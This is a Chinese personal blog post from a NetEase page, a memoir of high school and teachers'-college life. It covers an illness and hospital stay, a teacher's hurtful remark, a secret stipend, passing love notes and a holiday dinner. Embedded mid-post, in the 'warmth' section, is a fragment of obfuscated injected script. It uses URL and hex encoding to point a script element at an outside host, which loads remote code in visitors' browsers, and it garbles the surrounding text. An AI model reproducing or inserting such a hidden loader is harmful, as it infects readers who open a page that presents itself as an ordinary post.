注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

taoxi的博客

心有多大,天有多大。

 
 
 

日志

 
 

【原创】难忘校园  

2010-09-07 23:30:50|  分类: 随想 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

 

感谢伤害

      也许每个人都受过不同的伤害。有的伤害可能会毁了你一生;有的也可能给你力量,这就取决于你如何对待。

      记忆中,我受到一次最刻骨铭心的伤害是高中一年的最后一个学期。

      那是寒假结束后刚刚开学;有一天,剧烈头痛使我无法坚持上课。发烧使我失去了知觉,一个人静静躺在宿舍,周围什么也听不见,也看不见。晚上同学们回寝后,不知道和我说了什么,也不知道我回答了什么;也不知道是谁为我灌了热水袋(那是陶瓷的,我们都管它叫水鳖)。就这样我又昏昏沉沉睡去,一直到半夜被渴醒。我摸索着拿出水鳖,还带着温热,借着月光咕咚咕咚喝了起来,然后又躺下睡着了。第二天,同学们又都上课去了。班主任吕殿阁老师见我仍不能上课,下午就找来了校医王大夫。王大夫来到宿舍给我测了体温,又给我打了一针退热针。后来据吕老师说,王大夫一量体温是41度,所要是到42度,就烧完了,没命了。而当时这一切,我并不知道。老师看我太重了,就和学校说出车送我上医院。大汽车停在校门前,有个老师让同学找来我哥哥(异父异母的哥哥),让他抱我上汽车,可是他拒绝了,因为他穿得像个大少爷,一看和我两个档次。我无言,也无泪,自己吃力想站起来,却站不起来,还是我的老师和同学把我抱上车,送到医院。于第二天老师和同学们都去医院看我,并且通知了我父亲。那时的老师像父母一样,非常关心学生。我时时刻刻都感受到来自老师和同学们的温暖。

      到了医院被收入院后,我的双腿已经失去活动能力,一切活动都在床上。就这样我住院一住就是一个多月,天天打针吃药。梳头、洗脸、打饭,大小便等一切活动都要靠护理员(那时医院有护理员负责照顾重病患者),一直住了一个多月,才能下地活动。能活动了,按照医院要求,又在家休养了一个多月,就这样一下子耽搁了三个月课程;临近期末考试,我返回了学校。

      期末大家都进入紧张的复习阶段。一天晚自习,有一道物理题不会,就找到教我们物理的刘全清老师。当时他接过书一看,带着极不耐烦的口气说:“这不是给你做的,是给那些学习好的同学留的!”他没有告诉我,转身走了。我呆呆的站了几秒钟,一声不吭收拾好我的课本离开教室,回到宿舍。泪水在眼眶里转了又转,我使劲控制着不让自己哭出来。当时觉得自尊心受到极大伤害,发誓不会的再也不找刘老师问。就这样同学们都在教室复习,为的是发现不会的能随时问老师。而我知道,三个月耽搁的课程无论如何也无法一下子掌握,我还能去问什么呢?我一个人闷在宿舍自己复习,自己给自己补课。功夫总没有亏待我,居然五道物理题我全答对了。遗憾的是几何和物理不及格,但是那时候规定三科不及格留级,所以幸运的跟班升级了。

       这次自尊心的伤害是我一生难忘的,但是它却给了我力量,使我战胜了自己,我成功了。能有后来的努力发奋,我应该感谢物理刘老师;是他让我懂得,做人要自强自立,不要祈求别人帮助你;也不要试图别人同情你。功到自然成,成功要靠自己去努力、去奋斗!

 

温暖

  中学时代是学生时代最真挚纯洁的时代,也是我最开心快乐幸福的时代。老师同学给我留下了抹不去的印迹。令我最感动的是来自老师和同学们的温暖。老师胜过父母般的关心,同学都亲如兄弟姐妹,让我沐浴了亲情般的温暖。

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<   记得那时我和异父异母的哥哥一个学校,他喜欢穿着打扮,人长得帅气,又会穿,气质特好,一看就是家庭条件非常优越;而他也常常以干部子弟自居;而我相形见绌,一看穿衣打扮就是贫家弟子。高二时,班主任老师杨文志是个正直善良的好老师,见到我的窘境,就和班干部商量给我特殊申请了一份“助学金”,是为了让我买衣服鞋子。而且老师和班干部再三嘱咐我,不要和家人说。因为论条件我是不能享受助学基金的。父亲每月给我的生活费是用于伙食费的。当我拿到第一次获得的助学金时,感动得不知怎么样才好。这件事深深印在我脑海中,一生不曾忘记,让我感悟了如同亲人的师生情。

      高中那些老师和同学们使我感悟了人间真情,感悟到学校温暖。

 

陈老师

在师范学院住宿期间,作为一个特殊人员,既非职工、又非学生,但是我受到了大家最好的照顾,让我感到很幸福快乐。这里老师和职工都叫我“小刘丫”,拿我当小孩子看待,处处照顾我,关心我,呵护我,也正因为这样我享受了人间温暖和真情。回想那时候的自己真的好可笑,幼稚无知、刁蛮任性,真的像个小破孩。其实那时候我也十多岁了,上初中了,只是长得又瘦又小,她们就都拿我当小孩子看。

记得有一次参加学农(那时候,学生们每学期都要参加学工学农劳动)秋收劳动,我突然肚子疼的不得了,陈老师见状赶紧过来问我:“是不是例假了?”而我那时什么也不懂,居然回答:“我才不立嫁呢!”。在我心里认为例假就指嫁人,所以我的回答令老师啼笑皆非。陈老师看我不明白,知道不是这么回事,心想可能着凉了,找同学陪我回到老乡家,喝了一点热水,在热炕头又烙烙好了。

最可笑的一次,陈老师批评我后,最后又哄我。原因是施姐带我看了一场电影“可怜天下父母心”,因为是晚场的,回来太晚了,我没有完成作文;第二天上学后,我在课桌底下急急忙忙突击写。作文题目是“一件小事”,没想到被发现了。放学后被陈老师留下狠狠批评了一顿,都晚上六点了,才让我走。那么晚了,上那吃饭去?我很生气,于是在老师办公室死活也不走,无奈老师只好像哄自己的孩子一样哄着我,送我回到食堂,找大师傅。那个大师傅也是热心肠,什么也没说就给我热了饭。

    现在想起来自己小时候真的好笑,但是这件事也一直留在我的心里,我感到陈老师像父母一样爱我们,比父母还要关心我们的成长。

 

当邮差

那时候学生和老师谈恋爱,可不像现在这样方便。记得我同寝的白云秀老师和大学生宫玉林谈恋爱,约会就用纸条,而我就成了她们的最佳人选。白老师有什么事会写在纸条上,然后叠成长条让我送到男生宿舍给宫玉林。至于写的什么,虽然没有信封,可是却从来没有打开看过。那时自己很乐于跑腿,觉得像邮递员一样很好玩,所以每次都会以最快速度送去,待宫玉林写了回条折上后,我会像小鸟一样连蹦带跳赶紧跑回来交给白老师。 记不得为她们当了多少次信使。只记得白老师个子矮矮的,但是很漂亮;宫玉林个子高高的,长得有些像日本人,文静静的很秀气。

 

快乐的春节

 

学生时代是我最快乐的时代。不知道什么叫愁。记得有一年春节。学院很多大学生都留在了学校。他们有他们的快乐,可以和同学一起(现在才知道,有的是为了朋友)开开心心的玩。他们男女同学一起唱歌跳舞自有一番快乐;而我的快乐就是和大家一起包饺子,当然我的任务很简单是摆饺子。我会给她们运饺子皮。炊事员还给了我八分钱,让我包到饺子里。据说年三十包饺子时,包上钱、红枣、黑炭,谁吃到谁吉利。钱,是发财,有钱花;碳,是黑心;枣,是日子过得甜美。

晚上吃饭时非常热闹。大约有十五六桌的学生留校,每十人一桌。那天可以喝酒,而我又被委以重任,往来穿梭于个桌子之间;这个让给那个老师敬酒,就会把酒杯交到我手里让我跑腿,而我也乐此不彼。气氛非常热烈,大家都很高兴,这是在家里享受不到的。也许年龄的差异,让我一直处于被娇宠的地位,没有任何人拿我当大人,也许正因为这样,我叼蛮任性,不懂事,立事真的很晚。

那年由于没回去过年,给哥哥嫂嫂急得不得了,可是我却很开心。

    

 

  评论这张
 
阅读(63)| 评论(2)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017